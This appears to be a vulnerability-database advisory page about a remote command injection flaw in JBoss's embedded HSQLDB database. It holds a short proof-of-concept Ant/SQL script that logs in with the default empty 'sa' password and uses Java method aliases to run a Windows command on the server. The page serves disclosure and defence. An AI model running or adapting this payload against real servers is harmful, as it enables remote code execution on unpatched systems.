exploits , vulnerabilities , articles , JBoss HSQLDB Remote Command Injection Vulnerability

Title	JBoss HSQLDB Remote Command Injection Vulnerability
Published	2003-10-06-12:00AM
Updated	2005-07-04-02:57PM
Class	Unknown
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery is credited to Marc Schoenefeld.
Vulnerable	jBpm.org jBpm 2.0 JBoss Group JBoss 3.2.1 JBoss Group JBoss 3.2.1 JBoss Group JBoss 3.0.8
Not Vulnerable
Code	The researchers who discovered this vulnerability have developed a working exploit which is not publicly available or known to be circulating in the wild. The following proof of concept is available: <target name="cmdinject"> <sql classpath="hsqldb.jar" driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:hsql://${host}:${port}" userid="sa" password="" print = "true" > CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug" CREATE ALIAS SETPROP FOR "java.lang.System.setProperty"; CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile"; CALL COMPDEBUG(true); CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe'); CALL COMPILE('/c REGEDIT.EXE',''); </sql> </target>
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-04 Rae Media Web Based Contact Management Login SQL Injection Vulnerability
• 2008-12-04 Nagios External Commands and Adaptive Commands Unspecified Vulnerability
• 2008-12-04 Z1Exchange SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 mvnForum Cross Site Scripting Vulnerability
• 2008-12-04 i-Net Solution Orkut Clone SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
• 2008-12-04 Jbook SQL Injection Vulnerability
• 2008-12-04 SquirrelMail Malformed HTML Mail Message HTML Injection Vulnerability
• 2008-12-04 HP-UX Unspecified Local Denial Of Service Vulnerability
• 2008-12-04 Netrw Vim Script Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:16:02 +0000